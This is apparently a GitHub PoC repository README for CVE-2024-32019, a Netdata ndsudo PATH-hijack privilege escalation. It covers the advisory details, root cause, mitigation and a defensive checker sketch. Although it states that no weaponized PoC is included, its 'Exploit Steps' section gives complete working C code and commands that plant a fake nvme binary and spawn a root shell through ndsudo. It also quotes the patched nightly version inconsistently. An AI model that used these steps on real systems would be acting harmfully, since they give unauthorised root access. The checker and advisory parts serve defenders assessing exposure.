CVE-2024-32019 PoC — ndsudo: local privilege escalation via untrusted search path

Associated Vulnerability
Title: ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)
Description: Netdata is an open source observability tool. In affected versions the `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Readme
## CVE-2024-32019 — Netdata `ndsudo` Local Privilege Escalation

### Summary

Netdata’s `ndsudo` helper (installed `setuid root`) restricts which commands it will run, but **resolves those commands using the caller’s `PATH`**. In impacted versions, a local user can place a malicious binary earlier in `PATH` and have `ndsudo` execute it with root privileges. **Patched in Netdata 1.45.3 and 1.45.0-169.**

### Affected / Patched

- **Affected:** `>= 1.44.0-60, < 1.45.0-169` and `>= 1.45.0, < 1.45.3` (per upstream advisory).
    
- **Fixed:** `1.45.3` (stable), `1.45.0-169` (nightly). [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
    

### Impact

Local **privilege escalation to root** on systems where `ndsudo` is installed SUID and the user can invoke it (commonly members of the `netdata` group). [NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-32019) [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)

### Root Cause (high-level)

- `ndsudo` is SUID-root and whitelists subcommands like `nvme-list`, `nvme-smart-log`, etc.
    
- It calls external executables by name (e.g., `nvme`), which are resolved via **`PATH`** instead of using absolute paths or a safe, fixed search.
    
- If a writable directory appears before system paths, an attacker can introduce a look-alike binary that gets executed as root. [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
    

### Safe Reproduction / Verification

This repository includes **non-exploit checkers** that:

- Inspect `/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo` (or wherever installed) for SUID/ownership.
    
- Enumerate `PATH` for **writable directories** earlier than common system paths.
    
- Confirm presence of whitelisted subcommand names that `ndsudo` might try to execute.
    
- Optionally run `ndsudo --test <subcommand>` to print the resolved command **without executing it** (use with caution, read code first). [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
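
The first two checks in the list above can be sketched in C as follows. This is an added example, not the checker code shipped in this repository; the function names and the `SYSTEM_DIRS` list are assumptions made for illustration.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Assumed list of root-owned system directories; adjust per distribution. */
static const char *const SYSTEM_DIRS[] = {
    "/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin"};

/* 1 = root-owned regular file with the set-user-ID bit, 0 = not, -1 = cannot stat. */
int is_suid_root(const char *file) {
    struct stat st;
    if (stat(file, &st) != 0) return -1;
    return S_ISREG(st.st_mode) && st.st_uid == 0 && (st.st_mode & S_ISUID) != 0;
}

static int is_system_dir(const char *dir) {
    for (size_t i = 0; i < sizeof SYSTEM_DIRS / sizeof *SYSTEM_DIRS; i++)
        if (strcmp(dir, SYSTEM_DIRS[i]) == 0) return 1;
    return 0;
}

/* Count PATH entries searched before the first system directory that the
 * caller controls: empty or relative entries (resolved against the current
 * directory) and directories the caller can write to. Run as the
 * unprivileged user being assessed; root passes every access() check. */
int risky_path_entries(const char *path) {
    int risky = 0;
    for (const char *p = path; p != NULL;) {
        char dir[4096];
        size_t len = strcspn(p, ":");
        if (len < sizeof dir) {
            memcpy(dir, p, len);
            dir[len] = '\0';
            if (is_system_dir(dir)) break;
            if (dir[0] != '/' || access(dir, W_OK) == 0) risky++;
        }
        p = p[len] ? p + len + 1 : NULL;
    }
    return risky;
}

int main(void) {
    const char *ndsudo = "/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo";
    printf("ndsudo SUID-root: %d, caller-controlled PATH entries: %d\n",
           is_suid_root(ndsudo), risky_path_entries(getenv("PATH")));
    return 0;
}
```

A SUID-root `ndsudo` on an unpatched version is exposed regardless of the current `PATH`, since the caller sets `PATH` at invocation; the count only shows whether the present environment already contains such an entry.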
    

> ⚠️ **No weaponized PoC** is included. This project is for defenders and researchers to **assess exposure** and **validate patches** responsibly.

### Mitigation

- **Upgrade** Netdata to **1.45.3** (stable) or **1.45.0-169** (nightly).
    
- As a defense-in-depth measure, prefer **absolute paths** or a sanitized, minimal `PATH` in SUID helpers; avoid granting unnecessary `ndsudo` access. [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93) [wiz.io](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)
    

### Exploit Steps

###### 1. Save the following C code as `nvme.c`:

```C
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
    setuid(0);
    setgid(0);
    execl("/bin/bash", "bash", NULL);
    return 0;
}
```

###### 2. Compile the Exploit

```bash
gcc nvme.c -o nvme
```

###### 3. Environment Set-Up

```bash
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
```

###### 4. Modify the `PATH`

```bash
export PATH=/tmp/fakebin:$PATH
```

###### 5. Exploit Command

```bash
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
```

### References

- NVD: CVE-2024-32019. [NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-32019)
    
- Netdata Advisory (GHSA-pmhq-4cxq-wj93). [GitHub](https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93)
    
- Wiz summary. [wiz.io](https://www.wiz.io/vulnerability-database/cve/cve-2024-32019)
    
- Snyk write-up. [Vulnerability Guide](https://security.snyk.io/vuln/SNYK-UNMANAGED-NETDATANETDATA-6613089)
    
- MITRE/CVE listing. [CVE](https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=netdata)

File Snapshot

```
[4.0K] /data/pocs/b9741c6f1f034447e0c514d5c0cdcdc65c65a548
├── [4.0K] checker_c
│   └── [1.4K] cve-2024-32019_check.c
├── [4.0K] checker_python
│   └── [2.7K] cve-2024-32019_check.py
└── [3.7K] README.md

2 directories, 3 files
```